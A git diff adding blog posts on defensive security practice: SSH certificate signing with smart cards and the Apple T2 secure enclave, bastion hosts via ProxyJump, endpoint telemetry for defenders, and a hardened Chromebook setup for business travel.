$ ssh-keygen -D $PKCS11_MODULE_PATH -s ca.pub -I example -n zone-web -V +1w -z 1 id_rsa.pub
|
||||||
|
Enter PIN for 'OpenPGP card (User PIN)':
|
||||||
|
Signed user key .ssh/id_rsa-cert.pub: id "example" serial 1 for zone-web valid from 2020-10-13T15:09:00 to 2020-10-20T15:10:40
|
||||||
|
|
||||||
|
The same concept goes for a user smart-card, except that is
|
||||||
|
a plug and play as long as you have the gpg-agent
|
||||||
|
running. When the id_rsa-cert.pub (the signed certificate of
|
||||||
|
e.g. a Yubikey) is located in ~/.ssh, SSH will find the
|
||||||
|
corresponding private key automatically. The workflow will
|
||||||
|
be something along these lines:
|
||||||
|
|
||||||
|
[ User smartcard ] -----------> [ CA smartcard ]
|
||||||
|
^ id_rsa.pub |
|
||||||
|
| | signs
|
||||||
|
|------------------------------|
|
||||||
|
sends back id_rsa-cert.pub
|
||||||
|
|
||||||
|
|
||||||
|
## A Simple Bastion Host Setup
|
||||||
|
|
||||||
|
The other thing I wanted to mention was the -J option of
|
||||||
|
ssh, ProxyJump.
|
||||||
|
|
||||||
|
ProxyJump allows a user to confidentially, without risk of a
|
||||||
|
man-in-the-middle (MitM), to tunnel the session through a
|
||||||
|
central bastion host end-to-end encrypted.
|
||||||
|
|
||||||
|
Having end-to-end encryption for an SSH proxy may seem
|
||||||
|
counter-intuitive since it cannot inspect the
|
||||||
|
content. I believe it is the better option due to:
|
||||||
|
|
||||||
|
* It is a usability compromise, but also a security
|
||||||
|
compromise in case the bastion host is compromised.
|
||||||
|
* Network access and application authentication (and even
|
||||||
|
authorization) goes through a hardened point.
|
||||||
|
* In addition the end-point should also log what happens on
|
||||||
|
the server to a central syslog server.
|
||||||
|
* A bastion host should always be positioned in front of the
|
||||||
|
server segments, not on the infrastructure perimeter.
|
||||||
|
|
||||||
|
A simple setup looks like the following:
|
||||||
|
|
||||||
|
[ client ] ---> [ bastion host ] ---> [ server ]
|
||||||
|
|
||||||
|
|
||||||
|
Practically speaking a standalone command will look like
|
||||||
|
follows:
|
||||||
|
|
||||||
|
ssh -J jump.example.com dest.example.com
|
||||||
|
|
||||||
|
|
||||||
|
An equivalent .ssh/config will look like:
|
||||||
|
|
||||||
|
Host j.example.com
|
||||||
|
HostName j.example.com
|
||||||
|
User sshjump
|
||||||
|
Port 22
|
||||||
|
|
||||||
|
Host dest.example.com
|
||||||
|
HostName dest.example.com
|
||||||
|
ProxyJump j.example.com
|
||||||
|
User some-user
|
||||||
|
Port 22
|
||||||
|
|
||||||
|
With the above configuration the user can compress the
|
||||||
|
ProxyJump SSH-command to "ssh dest.example.com".
|
||||||
|
|
||||||
|
## Further Work
|
||||||
|
|
||||||
|
The basic design shown above requires one factor which is
|
||||||
|
probably not acceptable in larger companies: someone needs
|
||||||
|
to manually sign and rotate certificates. There are some
|
||||||
|
options mentioned in open sources, where it is normally to
|
||||||
|
avoid having certificates on clients and having an
|
||||||
|
authorization gateway with SSO. This does however introduce
|
||||||
|
a weakness in the chain.
|
||||||
|
|
||||||
|
I am also interested in using SSH certificates on iOS, but
|
||||||
|
that has turned out to be unsupported in all apps I have
|
||||||
|
tested so far. It is however on the roadmap of Termius,
|
||||||
|
hopefully in the near-future. Follow updates on this subject
|
||||||
|
on my Honk thread about it [4].
|
||||||
|
|
||||||
|
For a smaller infrastructure like mine, I have found the
|
||||||
|
manual approach to be sufficient so far.
|
||||||
|
|
||||||
|
|
||||||
|
[1] Scalable and secure access with SSH: https://engineering.fb.com/security/scalable-and-secure-access-with-ssh/
|
||||||
|
[2] Using a CA with SSH: https://www.lorier.net/docs/ssh-ca.html
|
||||||
|
[3] Using PIV for SSH through PKCS #11:
|
||||||
|
https://developers.yubico.com/PIV/Guides/SSH_with_PIV_and_PKCS11.html
|
||||||
|
[4] https://cybsec.network/u/tommy/h/q1g4YC31q45CT4SPK4
|
94
data/ssh-certs-apple-t2.md
Normal file
94
data/ssh-certs-apple-t2.md
Normal file
|
@ -0,0 +1,94 @@
|
||||||
|
## Key Takeaways
|
||||||
|
|
||||||
|
* SSH certificates can be used with the Apple T2 chip on
|
||||||
|
macOS as an alternative to external smart cards,
|
||||||
|
authenticated with a fingerprint per session.
|
||||||
|
* The Mac T2 chip serves as an extra security layer by creating
|
||||||
|
private keys in the secure enclave.
|
||||||
|
* The CA can be stored on an external smartcard, only
|
||||||
|
signing for access in a limited period - again limiting
|
||||||
|
the exposure.
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
|
||||||
|
Over the past days I have been going down a deep, deep
|
||||||
|
rabbit hole of SSH proxy jumping and SSH certificates
|
||||||
|
combined with smart cards.
|
||||||
|
|
||||||
|
After playing around with smart cards for SSH, I recognized
|
||||||
|
that not only external smart cards such as the Yubikey or
|
||||||
|
Nitrokey is a possible lane to go down.
|
||||||
|
|
||||||
|
Mac computers comes with a security chip called T2. This chip is
|
||||||
|
also known to host something Apple calls Secure Enclave [1]. In
|
||||||
|
the Secure Enclave you can store keys.
|
||||||
|
|
||||||
|
It will probably not serve as an equally secure solution as with
|
||||||
|
external smart cards, but it is a better balance for usability.
|
||||||
|
|
||||||
|
The T2 is permanently stored in hardware on one host only,
|
||||||
|
so the access needs to be signed on a per-host basis. In
|
||||||
|
such I would say the T2 and external smart cards complement
|
||||||
|
each other.
|
||||||
|
|
||||||
|
Always having the key available will bring two additional
|
||||||
|
vulnerabilities:
|
||||||
|
|
||||||
|
* If compromised, the key is always available logically
|
||||||
|
* Separation of equipment and key is not possible e.g. in a
|
||||||
|
travel situation
|
||||||
|
|
||||||
|
With a central pubkey directory tied to an identity
|
||||||
|
(automated), the T2 can be of better use for an enterprise
|
||||||
|
setup.
|
||||||
|
|
||||||
|
## Setting up a Private Key in Secure Enclave
|
||||||
|
|
||||||
|
While fiddling around I found sekey on Github [2]. The
|
||||||
|
project seems abandoned, but it is the secure enclave that
|
||||||
|
does the heavy lifting.
|
||||||
|
|
||||||
|
The short and easy setup are:
|
||||||
|
|
||||||
|
$ brew cask install sekey
|
||||||
|
$ echo "export SSH_AUTH_SOCK=$HOME/.sekey/ssh-agent.ssh" >> ~/.zshrc
|
||||||
|
$ echo "IdentityAgent ~/.sekey/ssh-agent.ssh" >> ~/.ssh/config
|
||||||
|
$ source ~/.zshrc
|
||||||
|
|
||||||
|
A keypair can now be generated in the secure enclave by:
|
||||||
|
|
||||||
|
$ sekey --generate-keypair SSH
|
||||||
|
$ sekey --list-keys
|
||||||
|
|
||||||
|
Now export the public key of the curve generated on-chip:
|
||||||
|
|
||||||
|
$ sekey --export-key <id> > id_ecdsa.pub
|
||||||
|
|
||||||
|
Using the trick we found in our recent venture into using
|
||||||
|
smart cards for signing the key, we can used PCKS#11 without
|
||||||
|
compromising security [3]. In this case I use a Nitrokey:
|
||||||
|
|
||||||
|
$ brew cask install opensc
|
||||||
|
$ PKCS11_MODULE_PATH=/usr/local/lib/opensc-pkcs11.so
|
||||||
|
$ ssh-keygen -D $PKCS11_MODULE_PATH -e > ca.pub
|
||||||
|
$ ssh-keygen -D $PKCS11_MODULE_PATH -s ca.pub -I example -n zone-web -V +1h -z 1 id_ecdsa.pub
|
||||||
|
Enter PIN for 'OpenPGP card (User PIN)':
|
||||||
|
Signed user key id_ecdsa-cert.pub: id "example" serial 1 for zone-web valid from 2020-10-14T20:26:00 to 2020-10-14T21:27:51
|
||||||
|
cp id_ecdsa-cert.pub ~/.ssh/
|
||||||
|
|
||||||
|
If you now try to ssh into a server using the given
|
||||||
|
certificate authority as shown in the SSH-CA post [3],
|
||||||
|
access should be granted with a fingerprint.
|
||||||
|
|
||||||
|
## A Word of Caution
|
||||||
|
|
||||||
|
The T2 has some vulnerabilities shown recently [4]. Make
|
||||||
|
sure to include these in your risk assessment of using
|
||||||
|
it. If you won't go down the smart card route it will still
|
||||||
|
be better than storing the key on disk.
|
||||||
|
|
||||||
|
|
||||||
|
[1] https://support.apple.com/guide/security/secure-enclave-overview-sec59b0b31ff/web
|
||||||
|
[2] https://github.com/sekey/sekey
|
||||||
|
[3] https://secdiary.com/2020-10-13-ssh-ca-proxyjump.html
|
||||||
|
[4] https://inks.cybsec.network/tag/t2
|
250
data/telemetry.md
Normal file
250
data/telemetry.md
Normal file
|
@ -0,0 +1,250 @@
|
||||||
|
Telemetry for cyber security is currently at a
|
||||||
|
crossroads. While past methods have been efficient by being
|
||||||
|
based on network monitoring, the current revolution in
|
||||||
|
encryption and the distributed workspace makes it
|
||||||
|
insufficient to solely rely on network monitoring. Through
|
||||||
|
this post we are going to focus on the current challenges.
|
||||||
|
|
||||||
|
> Telemetry is an electrical apparatus for measuring a
|
||||||
|
> quantity (such as pressure, speed, or temperature) and
|
||||||
|
> transmitting the result especially by radio to a distant
|
||||||
|
> station
|
||||||
|
> – Meriam Webster
|
||||||
|
|
||||||
|
Telemetry, a term mostly used by AV-vendors, have become
|
||||||
|
broadly applied as services change from a central to
|
||||||
|
decentralised geographically spread. Yesterday an employee
|
||||||
|
would work at his desk from 9-5 and then go home, while
|
||||||
|
today's modern worker moves around the office area and can
|
||||||
|
basically work from anywhere in the world when they feel
|
||||||
|
like it.
|
||||||
|
|
||||||
|
In cyber security, telemetry can generally be categorised
|
||||||
|
in: 1) Network-centric and 2) endpoint-based. A complete
|
||||||
|
telemetry profile is essential for being able to monitor
|
||||||
|
security events and to execute retrospective
|
||||||
|
analysis. Through my recent article on indicators [1] I
|
||||||
|
proposed a structure for indicators organised in three
|
||||||
|
levels of abstraction. In this article a telemetry profile
|
||||||
|
means something that covers a degree of these three levels.
|
||||||
|
|
||||||
|
| Level of abstraction | | Formats
|
||||||
|
|-----------------------|----|-------------
|
||||||
|
| Behavior | | MITRE (PRE-)ATT&CK
|
||||||
|
|-----------------------|--->|-------------
|
||||||
|
| Derived | | Suricata+Lua, Yara
|
||||||
|
|-----------------------|--->|-------------
|
||||||
|
| Atomic | | OpenIOC 1.1
|
||||||
|
|
||||||
|
|
||||||
|
## The Challenges
|
||||||
|
|
||||||
|
There are generally two problems that needs to be fully
|
||||||
|
solved when collecting data for cyber security:
|
||||||
|
|
||||||
|
* The use of encryption from end-to-end
|
||||||
|
* Workers and thereby the defended environment are or will be distributed
|
||||||
|
|
||||||
|
As of February 2017 the web was 50% encrypted [2]. Today
|
||||||
|
that number [3] is growing close to 70%.
|
||||||
|
|
||||||
|
For defense purposes, it is possible to identify malicous
|
||||||
|
traffic, such as beaconing, through metadata analysis. There
|
||||||
|
have been some developments on detecting anomalies in
|
||||||
|
encrypted content lately - namely the fingerprinting of
|
||||||
|
programs using SSL/TLS. In the future I believe this will be
|
||||||
|
the primary role of network-based detection. This is
|
||||||
|
actually a flashback to a pre-2010 monitoring environment
|
||||||
|
when full content was rarely stored and inspected by
|
||||||
|
security teams.
|
||||||
|
|
||||||
|
An additional element to consider is the previous debate
|
||||||
|
about public key pinning, which has now evolved into
|
||||||
|
Expect-CT [4]. This means that man in the middle (MitM)
|
||||||
|
techniques is going to be a no-no at some point. Yes, that
|
||||||
|
includes your corporate proxy as well.
|
||||||
|
|
||||||
|
There is one drawback and dealbreaker with the above for
|
||||||
|
security teams: it requires access to the datastream used by
|
||||||
|
the endpoints to be fully effective.
|
||||||
|
|
||||||
|
VPNs are going away as more resilient and modern network
|
||||||
|
architectures will become dominating. The most promising
|
||||||
|
challenger at the moment is the Beyondcorp [5] (based on
|
||||||
|
zero trust) architecture proposed by Google more than six
|
||||||
|
years ago. A zero trust architecture means that clients will
|
||||||
|
only check in to the corporate environment at the points
|
||||||
|
that _they_ need or are in the vicinity of corporate
|
||||||
|
resources. Other activity, such as browsing on external
|
||||||
|
websites are actually no longer going via the corporate
|
||||||
|
infrastructure or its monitored links. Additionally, the
|
||||||
|
endpoint is easily the most common infiltration vector.
|
||||||
|
|
||||||
|
To be honest, the Beyondcorp model reflects to a larger
|
||||||
|
extent how humans actually interact with computers. Humans
|
||||||
|
have never been confined to the perimeter of the enterprise
|
||||||
|
network. This may be some of the reason for organisations
|
||||||
|
being in a currently defeatable state as well. The only ones
|
||||||
|
to confine themselves to the enterprise network is
|
||||||
|
ironically the network defenders.
|
||||||
|
|
||||||
|
> The only ones to confine themselves to the enterprise network is
|
||||||
|
> ironically the network defenders.
|
||||||
|
|
||||||
|
The battle of controlling the technology evolution is not
|
||||||
|
completely lost though, it is a matter of changing the
|
||||||
|
mindset of where data or telemetry is collected. Yesterday
|
||||||
|
it was at the corporate proxy or in the corporate
|
||||||
|
environment - today it is on the endpoint and during the
|
||||||
|
connections to valuable resources.
|
||||||
|
|
||||||
|
For endpoints, the primary challenges currently faced are:
|
||||||
|
|
||||||
|
* Maintaining the integrity of locally stored and buffered data
|
||||||
|
* The availability and transport of data to a centralised logging instance
|
||||||
|
* Confidentiality of the data in transport or at rest
|
||||||
|
* Data source consistency for central correlation of information from several
|
||||||
|
host sources
|
||||||
|
* Raising the stakes on operational security in a cat and mouse
|
||||||
|
chase between intruders and defenders
|
||||||
|
|
||||||
|
Remote logging is a subject that has gained much publicity
|
||||||
|
previously, so we are not going into depth about that here.
|
||||||
|
|
||||||
|
### Existing Tooling For Endpoints
|
||||||
|
|
||||||
|
This section was not originally a part of the scope of this
|
||||||
|
article, but I'd like to establish a baseline of parts of
|
||||||
|
the available tooling to handle the above issues. I also
|
||||||
|
believe it touches some of the endpoint challenges.
|
||||||
|
|
||||||
|
For the purpose of this article, we define the following
|
||||||
|
well-known computer abstraction stack:
|
||||||
|
|
||||||
|
1. Hardware
|
||||||
|
2. Operating System
|
||||||
|
3. Application
|
||||||
|
|
||||||
|
Hardware verification and logging is currently a more or
|
||||||
|
less unexplored field, with primarily only one tool
|
||||||
|
available to my knowlege. That tool is Chipsec [6] which has
|
||||||
|
been of interest and integrated into the Google Rapid
|
||||||
|
Response (GRR) [7] project for some time.
|
||||||
|
|
||||||
|
Operating system logs are well understood today, and many
|
||||||
|
organisations manages logging from the host operating system
|
||||||
|
properly.
|
||||||
|
|
||||||
|
There are increasingly good event streaming and agent-based
|
||||||
|
systems available, such as LimaCharlie [8], Sysmon [9] and
|
||||||
|
Carbon Black [10]. The media focus of these platforms are on
|
||||||
|
the more trendy term "hunting", but their real purpose is
|
||||||
|
OS-level logging and pattern matching.
|
||||||
|
|
||||||
|
Further, distributed forensic platforms are available from
|
||||||
|
FireEye (HX) and an open source equivalent from Google named
|
||||||
|
GRR. GRR have been featured extensively on this site
|
||||||
|
previously. Common for these are that they do not stream
|
||||||
|
events, but rather stores information on the endpoint.
|
||||||
|
|
||||||
|
Application layer logging is extremely challenging. The
|
||||||
|
logging mechanism in this regard needs to be connected to
|
||||||
|
the structure of the application itself, and there are a lot
|
||||||
|
of applications. Further, many application developers does
|
||||||
|
not focus on logging.
|
||||||
|
|
||||||
|
Application logging is important and could be seen as the
|
||||||
|
technical contextual information provided by the
|
||||||
|
endpoint. Exposed applications that are important in terms
|
||||||
|
of coverage:
|
||||||
|
|
||||||
|
* Browsers
|
||||||
|
* Email Readers
|
||||||
|
* Application Firewalls (if you have one)
|
||||||
|
* Instant Messaging Clients
|
||||||
|
* Rich Document editors, such as Excel, Word, Powerpoint
|
||||||
|
|
||||||
|
These applications are important since they are the first
|
||||||
|
point of contact for almost any technical threat. Done
|
||||||
|
right, application logs will be at a central location before
|
||||||
|
the intruder manages to get a foothold on the client. Thus,
|
||||||
|
the risk of data being misrepresented in the central system
|
||||||
|
are highly reduced (integrity).
|
||||||
|
|
||||||
|
Taking browsers and Microsoft Office as an example, there
|
||||||
|
are some options readily available:
|
||||||
|
|
||||||
|
* Firefox HTTP and DNS logging: mozilla.org [11]
|
||||||
|
* Office Telemetry logging: Office Telemetry Log [12]
|
||||||
|
|
||||||
|
The above examples are not security focused as far as I
|
||||||
|
could tell, more often they are debug oriented. However, the
|
||||||
|
same data is often what we are after as well (such as: did
|
||||||
|
the document have a macro? or what is the HTTP header?).
|
||||||
|
|
||||||
|
The dependency on the application developers to create
|
||||||
|
logging mechanisms is quite a challenge in this
|
||||||
|
arena. However, I believe the solutions in cases where
|
||||||
|
applications does not log sufficiently is to take advantage
|
||||||
|
of plugins. Most modern applications supports plugins to
|
||||||
|
some extent.
|
||||||
|
|
||||||
|
To summarise the tooling discussion, we can populate the
|
||||||
|
computer abstraction layers with the mentioned tools.
|
||||||
|
|
||||||
|
| Level of abstraction | | Tools
|
||||||
|
|-----------------------|----|-------------
|
||||||
|
| Application | | Browser, Email and so on
|
||||||
|
|-----------------------|--->|-------------
|
||||||
|
| Operating System | | LC, CB, Sysmon,
|
||||||
|
|-----------------------|--->|-------------
|
||||||
|
| Hardware | | Chipsec
|
||||||
|
|
||||||
|
## Conclusions: How Do We Defend in The Future?
|
||||||
|
|
||||||
|
In this article we have defined a structure and discussed in
|
||||||
|
short one of the most prominent challenges faced by
|
||||||
|
enterprise defenders today: how do we defend in the future?
|
||||||
|
|
||||||
|
Technology. This is the point were technology alone is no
|
||||||
|
longer the sole solution to defending a network. Modern
|
||||||
|
network architectures means that defenders needs to be able
|
||||||
|
to fully comprehend and use the human nature as sensors. It
|
||||||
|
is also about building intuitive systems which makes the
|
||||||
|
necessary data and information available to the
|
||||||
|
defenders. In my mind technology has never been the sole
|
||||||
|
solution either, so the technology evolution is for the
|
||||||
|
greater good.
|
||||||
|
|
||||||
|
It seems obvious and unavoidable to me that network
|
||||||
|
defenders must start looking outside the perimeter, just as
|
||||||
|
intruders have done for many years already. This means
|
||||||
|
adapting the toolsets available and lobbying for an
|
||||||
|
architecture that reflects how humans actually use
|
||||||
|
technology resources. Most people have owned private
|
||||||
|
equipment for many years (surprise), and the line between
|
||||||
|
employee and enterprise is blurred and confusing when
|
||||||
|
realitity now sinks in.
|
||||||
|
|
||||||
|
This means, in the technology aspect, that an emphasis must
|
||||||
|
be put on the endpoints - and that network monitoring must
|
||||||
|
again be about the metadata of the activity. In short:
|
||||||
|
collect metadata from networks and content from endpoints.
|
||||||
|
|
||||||
|
Only this way will we, in the future, be able to create a
|
||||||
|
full telemetry profile from each device under our
|
||||||
|
responsibility.
|
||||||
|
|
||||||
|
|
||||||
|
[1] Article on indicators: /indicators/
|
||||||
|
[2] 50% encrypted: https://www.eff.org/deeplinks/2017/02/were-halfway-encrypting-entire-web
|
||||||
|
[3] that number: https://letsencrypt.org/stats/
|
||||||
|
[4] Expect-CT: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Expect-CT
|
||||||
|
[5] Beyondcorp: https://cloud.google.com/beyondcorp/
|
||||||
|
[6] Chipsec: https://github.com/chipsec/chipsec
|
||||||
|
[7] Google Rapid Response (GRR): https://github.com/google/grr-doc/blob/master/publications.adoc
|
||||||
|
[8] LimaCharlie: https://github.com/refractionPOINT/lce_doc/blob/master/README.md
|
||||||
|
[9] Sysmon: https://www.rsaconference.com/writable/presentations/file_upload/hta-w05-tracking_hackers_on_your_network_with_sysinternals_sysmon.pdf
|
||||||
|
[10] Carbon Black: http://the.report/assets/Advanced-Threat-Hunting-with-Carbon-Black.pdf
|
||||||
|
[11] mozilla.org: https://developer.mozilla.org/en-US/docs/Mozilla/Debugging/HTTP_logging
|
||||||
|
[12] Office Telemetry Log: https://msdn.microsoft.com/en-us/library/office/jj230106.aspx
|
361
data/travel.md
Normal file
361
data/travel.md
Normal file
|
@ -0,0 +1,361 @@
|
||||||
|
Travelling with electronic devices is a challenge, and this is
|
||||||
|
certainly the case if you do not have a travel program for your
|
||||||
|
employees, where you must tinker with a new setup on a case by
|
||||||
|
case basis. The complexity of the matter is though, even when it
|
||||||
|
comes to resources, as it requires full time attention.
|
||||||
|
|
||||||
|
Some organisations choose to ignore the problem all together,
|
||||||
|
others again does not fully respect their own threat model. The
|
||||||
|
latter may be just as dangerous, as it may lead to a false sense
|
||||||
|
of security for the travellers.
|
||||||
|
|
||||||
|
This article is about establishing a technical laptop setup that
|
||||||
|
can be re-used with ease. Thus, other operational and strategic
|
||||||
|
aspects are left out. The information presented evolves around
|
||||||
|
organisations, but might as well apply for a private travel of
|
||||||
|
exposed individuals.
|
||||||
|
|
||||||
|
## Main Drivers
|
||||||
|
|
||||||
|
With that out of the way: multiple overall factors are left for
|
||||||
|
consideration. The following factors are the main drivers and
|
||||||
|
equally important when developing a technical model of an abroad
|
||||||
|
operation.
|
||||||
|
|
||||||
|
* Threat resiliency. Equipment on travel can really never be
|
||||||
|
secured well enough, but it can be hardened to the degree that a
|
||||||
|
threat actor needs to risk exposure to compromise it
|
||||||
|
* Usability for the traveller. Equipment that feels inconvenient
|
||||||
|
will be avoided by the traveller at some point
|
||||||
|
* Usability for the supporting organisation (both security and IT
|
||||||
|
operations). Such setups may require much time and attention to
|
||||||
|
develop and if there are an increasing number of travellers to
|
||||||
|
high risk areas the setup needs to scale
|
||||||
|
* Cost. A travel program is a balance between environment,
|
||||||
|
security and cost. If the cost and environmental impact
|
||||||
|
surpasses the value that needs to be secured, the travel program
|
||||||
|
misses some of its value. Critical infrastructure organisations
|
||||||
|
is a different ball game than other industries on this point.
|
||||||
|
|
||||||
|
When it comes to threats, the most prominent one is the evil maid
|
||||||
|
infiltration vector - which is basically someone gaining physical
|
||||||
|
access to a computer. Motherboard recently published an article
|
||||||
|
on how a malicious party could add a backdoor to a Dell (example
|
||||||
|
used) laptop in less than 5 minutes [1].
|
||||||
|
|
||||||
|
Other examples of relevant techniques used against travellers are:
|
||||||
|
electronic eavesdropping using cell networks, physical monitoring
|
||||||
|
of hotel rooms (e.g. camera surveillance), malicious charging
|
||||||
|
stations and so on. More details on general infiltration
|
||||||
|
techniques can be found in the Mitre ATT&CK's "Initial Access"
|
||||||
|
category (each described on their Wiki [1,2].
|
||||||
|
|
||||||
|
## Conceptual Overview
|
||||||
|
|
||||||
|
Now that we have reviewed the main drivers, the question is if you
|
||||||
|
can protect against the given threat model in an easily achievable
|
||||||
|
way. To assess that we will first have to a look at an conceptual
|
||||||
|
model for travel. Taking a top-down approach, the travel setup
|
||||||
|
will in most cases consist of two components:
|
||||||
|
|
||||||
|
1. The devices used for travel
|
||||||
|
2. The server side infrastructure
|
||||||
|
|
||||||
|
There are arguments for a standalone operation, but the legal
|
||||||
|
ramification and practical impact of sending an employee into a
|
||||||
|
hostile environment with anything but local encryption is risky at
|
||||||
|
best. To note: that is, if the user will actually produce or carry
|
||||||
|
anything of value. If not, a standalone setup may in some cases be
|
||||||
|
argued for.
|
||||||
|
|
||||||
|
Tactical no-brainers when travelling are the following:
|
||||||
|
|
||||||
|
1. The system should disclose as little as possible about the
|
||||||
|
traveller's pattern of activity and content
|
||||||
|
2. As little information as possible should be at rest on devices
|
||||||
|
at risk
|
||||||
|
3. It should come at a high cost to compromise the end-point both
|
||||||
|
for physical and technical exploitation
|
||||||
|
4. The equipment should never be connected to an organisation's
|
||||||
|
service infrastructure directly before, during or after travel
|
||||||
|
5. The system should not be obviously provocative to locals -
|
||||||
|
e.g. during airport inspections.
|
||||||
|
|
||||||
|
As far as I have found, there are currently one desktop system
|
||||||
|
that sufficiently meet these criterions - and that is ChromeOS
|
||||||
|
which comes with sane default settings, has a really minimal
|
||||||
|
configuration and is usable to an average person. However,
|
||||||
|
ChromeOS is not a mobile operating system - and for that purpose
|
||||||
|
iOS and Android is a better fit even though they do not tick off
|
||||||
|
all the above boxes.
|
||||||
|
|
||||||
|
With that in mind the following model, that I have named "The
|
||||||
|
Tactical Travel Protection Model", provides a hardened, basic
|
||||||
|
infrastructure setup that uses cloud providers to hide in plain
|
||||||
|
sight.
|
||||||
|
|
||||||
|
![The Tactical Travel Protection Model shows the concept of a full stack travel
|
||||||
|
setup](/static/img/data/tactical_travel_protection_model.png)
|
||||||
|
|
||||||
|
The model further detailed in the following section.
|
||||||
|
|
||||||
|
## Scalability and Technical Implementation
|
||||||
|
|
||||||
|
With the conceptual model shown in the last section, it is time to
|
||||||
|
dive into implementation in a practical situation. The beauty of
|
||||||
|
the model is its modularity, so a component - such as a cloud
|
||||||
|
server, can easily be put in a local and physically controlled
|
||||||
|
location. Thus, please consider the technologies mentioned as an
|
||||||
|
example - the power of the model comes to play when you start
|
||||||
|
switching things up.
|
||||||
|
|
||||||
|
### Server Side Components
|
||||||
|
|
||||||
|
Consider theavailability of external services in all parts of the
|
||||||
|
process. Ideally a travel device should store information only
|
||||||
|
outside the regional location of a traveller. Balance storage
|
||||||
|
with requirements of availability. An example of such is that an
|
||||||
|
enforced VPN connection may not always be available, which would
|
||||||
|
practically leave an SFTP link exposed or down.
|
||||||
|
|
||||||
|
For the example technologies used in the model shown in the
|
||||||
|
previous section, following sections shows the use.
|
||||||
|
|
||||||
|
#### Cloud Policy, Provisioning, Device and User Management
|
||||||
|
|
||||||
|
The reason we really need to use a device management service is
|
||||||
|
the scalability of deployment. Using a standalone approach may
|
||||||
|
work and provide some additional security due to the independence
|
||||||
|
of each device, but it is inevitable in the long run if you handle
|
||||||
|
even a low amount of travels.
|
||||||
|
|
||||||
|
In this case, especially due to using ChromeOS, G Suite is the
|
||||||
|
most straightforward choice. It is important to focus the solution
|
||||||
|
on managing devices when speaking of travels, not pushing
|
||||||
|
sensitive configuration files and so on. If encountering a
|
||||||
|
compromise of the G Suite administrative account - it is possible
|
||||||
|
to push threat actor-controlled applications and configurations to
|
||||||
|
devices. Due to this it is essential to clean out the management
|
||||||
|
domain or create a new, untraceable one once in a while.
|
||||||
|
|
||||||
|
G Suite is a granular solution. Examples of recommended policies
|
||||||
|
are: enforced use of security tokens and the disabling of other
|
||||||
|
two factor authentication options, screen lock upon lid close and
|
||||||
|
so on.
|
||||||
|
|
||||||
|
When testing G Suite and ChromeOS I figured that it is easiest to
|
||||||
|
provision VPN configuration files (``.onc``) and certificates
|
||||||
|
manually. For iOS the same goes with ``.mobileconfig``. Doing this
|
||||||
|
adds another protective layer.
|
||||||
|
|
||||||
|
#### VPN
|
||||||
|
|
||||||
|
For VPN, my experience is that the most reliable option is using
|
||||||
|
native supported VPN clients in the operating system used for
|
||||||
|
travel. In this case it is ChromeOS with OpenVPN and iOS with
|
||||||
|
IPSec. This adds a bit to the complexity as iOS does not support
|
||||||
|
OpenVPN which runs most reliably in some countries that censors
|
||||||
|
the Internet. However, ChromeOS does. The solution to this is
|
||||||
|
using two VPS nodes for tunneling traffic:
|
||||||
|
|
||||||
|
1. OpenVPN service through ansible-openvpn-hardened [4]
|
||||||
|
2. IPSec service through [5]. Lenny Zeltser created a
|
||||||
|
deployment-guide on algo recently [6]
|
||||||
|
|
||||||
|
Again: to reduce exposure through centrality, you should not
|
||||||
|
provision device-specific keys from central management
|
||||||
|
consoles. Also, make sure to use certificates by any service that
|
||||||
|
needs to connect to the Internet.
|
||||||
|
|
||||||
|
**OpenVPN**:
|
||||||
|
|
||||||
|
Configure according to the README on the
|
||||||
|
``ansible-openvpn-hardened`` Github page. When you deploy the
|
||||||
|
OpenVPN server, you will be left with a file named something like
|
||||||
|
``<user-id>@<random-word>.preregistration-pki-embedded.ovpn`` in
|
||||||
|
the ``fetched_credentials/<domain>`` directory. Just like Apple
|
||||||
|
has its ``mobileconfig`` format, the Chromium Project uses the
|
||||||
|
Open Network Configuration (ONC) [7]. In order to convert this
|
||||||
|
format to a working configuration file, use ovpn2onc.py [9] like
|
||||||
|
the following.
|
||||||
|
|
||||||
|
python3 reference/convert.py --infile *-pki-embedded.ovpn --outfile vpn_configuration.onc --name my_vpn
|
||||||
|
|
||||||
|
This results in a configuration file named
|
||||||
|
``vpn_configuration.onc``. ChromeOS will not give you any feedback
|
||||||
|
here, so make sure to read through everything to get it right the
|
||||||
|
first time. If you end up troubleshooting, I found that the
|
||||||
|
Chromium project do have some working examples [9]. Import
|
||||||
|
``vpn_configuration.onc`` in Chrome as shown in the next section.
|
||||||
|
|
||||||
|
Due to the hardened setup, be particularly strict to configure
|
||||||
|
with an OS version according to the repo README. For instance
|
||||||
|
Debian 8.10 won't work.
|
||||||
|
|
||||||
|
**Algo**: Has great docs as-is.
|
||||||
|
|
||||||
|
#### SFTP
|
||||||
|
|
||||||
|
An SFTP service is simple to manually deploy. However, when
|
||||||
|
scalability hardening matters it is best to automate the
|
||||||
|
deployment. Through testing available Ansible scripts I ended up
|
||||||
|
with Johan Meiring's ansible-sftp [10]. Again, the configuration
|
||||||
|
is self-explanatory. You should however note that public
|
||||||
|
keys should be put in a ``files/`` directory under
|
||||||
|
``ansible-sftp`` root. These can be generated with
|
||||||
|
``ssh-keygen``, the private keys needs to be stored somewhere else
|
||||||
|
for manual transfer to the laptop accessing it.
|
||||||
|
|
||||||
|
Since this is a traveller setup you should seek to create a
|
||||||
|
disconnect between cloud drives and rather use local storage and
|
||||||
|
SFTP. Disable OneDrive in Office 365 Business and Google Drive in
|
||||||
|
G Suite.
|
||||||
|
|
||||||
|
#### Deploying an Out-of-Band (OOB) Channel
|
||||||
|
|
||||||
|
Communications is king and perhaps one of the most important
|
||||||
|
things you configure.
|
||||||
|
|
||||||
|
I described using Matrix and Riot for OOB recently [11].
|
||||||
|
|
||||||
|
#### Security Keys
|
||||||
|
|
||||||
|
Nowadays, strong authentication is so easy that everyone should
|
||||||
|
use it. In a hostile environment it is hygiene. Google uses
|
||||||
|
Yubikeys and Feitian tokens in their authentication services and
|
||||||
|
so should a traveller [12,13,14]. This eliminates some of the
|
||||||
|
uncertainty when authenticating against remote servers and is
|
||||||
|
something the traveller can keep on-body at all times. For this
|
||||||
|
setup not every service can maintain usability when using
|
||||||
|
tokens. Those services - such as a mounted SFTP share should use
|
||||||
|
certificates.
|
||||||
|
|
||||||
|
|
||||||
|
### Client Side Components
|
||||||
|
|
||||||
|
So why a Chromebook?
|
||||||
|
|
||||||
|
* Has a minimal configuration. Everything you do is in the
|
||||||
|
browser
|
||||||
|
* You get granular control through G Suite
|
||||||
|
